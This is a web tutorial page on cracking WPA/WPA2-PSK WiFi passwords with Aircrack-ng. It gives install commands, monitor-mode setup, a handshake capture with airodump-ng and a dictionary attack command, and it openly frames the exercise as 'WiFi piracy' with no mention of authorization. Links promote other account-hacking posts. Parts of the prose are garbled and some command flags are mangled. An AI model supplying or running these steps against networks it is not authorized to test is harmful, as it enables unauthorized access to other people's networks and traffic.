How To Hack Wifi Password using Aircrack ng With Video Demonstration

0
9402
Hack wifi password using aircrack ng

Before Hack Wifi Password using Aircrack ng Let’s Know About What Is Aircrack ng

Aircrack-ng is a complete suite of tools to assess WiFi network security.

It focuses on different areas of WiFi security:

  • Monitoring: Packet capture and export of data to text files for further processing by third party tools.
  • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
  • Testing: Checking WiFi cards and driver capabilities (capture and injection).
  • Cracking: WEP and WPA PSK (WPA 1 and 2).

I probably should not tell you why the password cracking tool is nice to have. More than that, I would not have to explain the benefits of WiFi piracy – especially for you. So let’s go straight.

The tool you want to use here is Aircrack, ng.

“Aircrack Ng is a software suite consisting of Network Detector, Sniffer Tray, WEP Crack, WPA / WPA2-PSK and 802.11 Wireless Network Analysis Tool.”

It is recommended to manually install it.

Also Read: How To Lock Anyone Facebook Account Without Password

Hack Wifi Password using Aircrack ng,Installation for Linux users:

  • (sudo) apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev
  • wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz -O – | tar –xz
  • cd aircrack-ng-1.2-rc4
  • make
  • make install
  • aircrack-ng –help (make sure you have the latest version)

Before Hack Wifi Password using Aircrack ng Set It Up:

  • (sudo) airmon-ng check kill
  • airmon-ng start wlan0
  • airodump-ng mon0
  • airodump-ng -c 1 –bssid 00:11:22:33:44:55 -w WPAcrack mon0 –ignore-negative-one
    • -c = wireless network channel
    • –bssid = MAC address of access point
    • -w = file name prefix for authentication handshake
    • mon0 = wireless interface
    • –ignore-negative-one = fixes ‘fixed channel: -1’
  • Wait until handshake is captured

Get Password Dictionary From here

A large part of any word crack – this is easily a password dictionary. They are essential to success. You will not have luck if your database password is small with minimal options. Make sure you consult the different password dictionary available.

Also Read: How To Hack Facebook Using Firesheep With Video Demonstration

Now Run This Command

To obtain the password for WPA / WPA2-PSK connections, use the command:aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap

Remember that password crackers have patience, just like the mechanisms behind the tools involved learning. If you take the time to search for tutorials and various guides, you will get a hacking WiFi hacking – and many other things – in no time.

When you know what you are doing, the possibilities are truly endless.

 

Video Demonstration:

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.